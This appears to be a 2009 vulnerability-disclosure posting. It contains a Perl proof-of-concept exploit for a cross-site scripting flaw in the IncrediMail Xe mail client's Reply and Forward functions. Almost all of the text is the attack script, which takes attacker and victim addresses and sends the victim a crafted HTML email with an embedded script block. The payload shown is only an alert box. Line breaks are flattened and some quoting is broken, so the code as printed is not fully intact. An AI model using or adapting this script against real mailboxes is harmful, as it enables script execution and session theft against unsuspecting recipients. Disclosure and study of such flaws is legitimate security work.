incredimail-xss.txt
Posted on 25 March 2009
#!/usr/bin/perl -w # IncrediMail Xe (latest version) XSS Vulnerability # # Discovered by : Bui Quang Minh # # Description : The most of popular Mail Client now exclude Script Code for mail content. # It aims to avoid the type of XSS exploitation (For e.g: stolen cookie). # IncrediMail also remove Script Code when the user read mail. # However, I found the "Reply" and "Forward" function of the mail client # has not handled mail content well resulting in XSS vulnerability. # # My Blog : http://minhbq.blogspot.com use Net::SMTP; # ARGV Check if ($#ARGV != 2) { print " USAGE: IncrediMail.pl <Mail Server> <Attacker Email> <VicTim Email> "; exit; } $host = $ARGV[0]; $attacker = $ARGV[1]; $victim = $ARGV[2]; # Config SMTP $smtp = Net::SMTP->new( Host => $host, Hello => 'Hello world', Timeout => 30) or die "Couldn't connect to Mail Server "; # Attacker and Victim email $smtp->mail($attacker); $smtp->to($victim); # Send email $buffer = "From: XSS Vulnerability ". "To: XSS Vulnerability ". "Subject: XSS Vulnerability ". "MIME-Version: 1.0 ". "Content-Type: multipart/mixed; ". " boundary="--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019" ". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019 ". "Content-Type: text/html; ". " charset="utf-8" ". "Content-Transfer-Encoding: quoted-printable ". "Reply or Sender for XSS Vulnerability ". "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> ". "<HTML><BODY> ". "<script> alert('XSS Vulnerability') </script> ". "</BODY></HTML> ". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--"; $smtp->data(); $smtp->datasend($buffer); $smtp->quit(); print "Send Finish. ";
